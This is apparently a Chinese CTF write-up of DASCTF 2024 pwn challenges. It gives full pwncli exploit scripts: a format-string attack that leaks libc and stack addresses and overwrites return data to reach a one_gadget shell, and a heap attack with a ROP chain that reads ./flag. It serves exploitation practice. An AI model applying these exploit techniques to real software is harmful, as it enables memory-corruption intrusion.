DASCTF 2024暑期挑战赛

(没打,结束了才去看了题)

springboard

非栈上的格式化字符串

格式

1
%Yc%X$n

将Y写入栈上第X个位置指针指向的位置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
0x50a47 posix_spawn(rsp+0x1c, "/bin/sh", 0, rbp, rsp+0x60, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
  rbp == NULL || (u16)[rbp] == NULL

0xebc81 execve("/bin/sh", r10, [rbp-0x70])
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xebc85 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [rdx] == NULL || rdx == NULL

0xebc88 execve("/bin/sh", rsi, rdx)
constraints:
  address rbp-0x78 is writable
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

利用栈上的两条链来改写rbp以及返回地址,使满足one_gadget的要求

(懒得patch)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from LibcSearcher import *
from time import time

cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io   = gift['io'] # process或remote对象
elf  = gift["elf"] # ELF对象,ELF("./pwn")
libc = gift.libc # ELF对象, ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./rlibc.so.6")
    gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样,打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

# - - - - - - - - - - - - - #
onegadget = [0xebc85]
bss = 0x601800
# - - - - - - - - - - - - - #
def s_(c):
    sla("Please enter a keyword",c)
# - - - - - - - - - - - - - #
def pwn_exp():
    print('PWN')

    pleak = b'%3$p,%13$p'
    s_(pleak)
    ru('0x')
    libc.address = int(io.recv(12),16)-0x7fe8ea38b7e2+0x7fe8ea277000
    ru(',0x')
    stack = int(io.recv(12),16)-0x7fff9b06e258+0x7fff9b06e130
    
    p1 = '%'+str((stack+0x18)&0xffff)+'c%13$hn'
    p1 += '%c1%31$hn'
    s_(p1)

    one = libc.address + onegadget[0]
    a = one & 0xffff
    b = (one>>16)&0xff
    print(hex(b),hex(a))
    p = '%'+str(b)+'c%45$hhn'
    p += '%'+str(a-b)+'c%43$hn'
    s_(p)

    p2 = '%'+str((stack+0x10)&0xffff)+'c%13$hn'
    p2 += '%c1%31$hn'
    s_(p2)

    a = bss & 0xffff
    b = (bss>>16)&0xff
    print(hex(b),hex(a))
    p = '%'+str(b)+'c%45$hhn'
    p += '%'+str(a-b)+'c%43$hn'
    s_(p)

#log
    #libc=LibcSearcher("gets",gets_Addr);
    log.info('#---#---#---#---#')
    log.success('libc.address:'+hex(libc.address))
    log.success('stack:'+hex(stack))

if __name__ == '__main__':
    pwn_exp()
    io.interactive()

magicbook

libc为2.35

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/env python3
from pwncli import *
from ctypes import *
from LibcSearcher import *
from time import time

cli_script() # 使用脚本模式必须显式调用这个函数

# 你能够从gift里面取到很多东西
io   = gift['io'] # process或remote对象
elf  = gift["elf"] # ELF对象,ELF("./pwn")
libc = gift.libc # ELF对象, ELF("./libc.so.6")
filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

arch='amd64'
context(log_level = 'debug',os='linux',arch=arch)
if gift.remote:
    #libc = ELF("./rlibc.so.6")
    gift['libc'] = libc
    # 有时候远程提供的libc与本地不一样,打靶机时替换libc为远程libc
    pass
libc_box = LibcBox() # LibcBox对象

# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
def cmd(c):
    sla("Your choice:",str(c))
def add(size):
    cmd(1)
    sla("How many pages does your book need?",str(size))
def free(idx,choice=0,idx_=0,data=""):
    cmd(2)
    sla("which book would you want to delete?",str(idx))
    c = 'N'
    if choice == 1 :
        c = 'Y'
    sa("Do you want to say anything else before being deleted?(y/n)",c)
    if choice == 0:
        return
    sla("which page do you want to write?",str(idx_))
    sa("content: ",data)

def edit(data):
    cmd(3)
    sa("come on,Write down your story!",data)
def do(data):
    sa("come on,Write down your story!",data)
# - - - - - - - - - - - - - #
def pwn_exp():
    print('PWN')
    ru('give you a gift: ')
    elf.address = int(io.recv(14),16)-0x5642f87e1010+0x5642f87dd000
    add(0x428)#0
    add(0x30)#1
    add(0x418)#2
    free(0)
    add(0x438)#3
    free(2,1,0,p64_ex(elf.address + 0x4050-0x20)*3)
    add(0x438)#4

    CG.set_find_area(find_in_elf=True,find_in_libc=False)
    p1 = b'\x00'*0x20+p64_ex(CG.ret())+p64_ex(CG.pop_rdi_ret())+p64_ex(elf.got.puts)+p64_ex(elf.plt.puts)+p64_ex(elf.sym.edit_the_book)
    edit(p1)

    libc.address = recv_libc_addr(io) - libc.sym.puts
    
    CG.set_find_area(find_in_elf=True,find_in_libc=True)

    p2 = b'\x00'*0x20+p64_ex(CG.ret())+p64_ex(CG.pop_rdi_ret())+p64_ex(elf.address + 0x4088)+p64_ex(elf.plt.puts)+p64_ex(elf.sym.edit_the_book)
    do(p2)

    ru('\n')
    heap_base = u64_ex(io.recv(6))-0x557c29854fb0+0x557c29854000

    dest = heap_base + 0x557c29854fa0 - 0x557c29854000 + 0x10

    p3 = b'./flag'
    p3 = p3.ljust(0x28,b'\x00')
    p3 += CG.orw_chain(dest,dest+0x3000)

    do(p3)

#log
    #libc=LibcSearcher("gets",gets_Addr);
    log.info('#---#---#---#---#')
    log.success('libc.address: '+hex(libc.address))
    log.success('elf.address: '+hex(elf.address))
    log.success('heap_base: '+hex(heap_base))
    log.success('dest: '+hex(dest))

if __name__ == '__main__':
    pwn_exp()
    io.interactive()

vhttp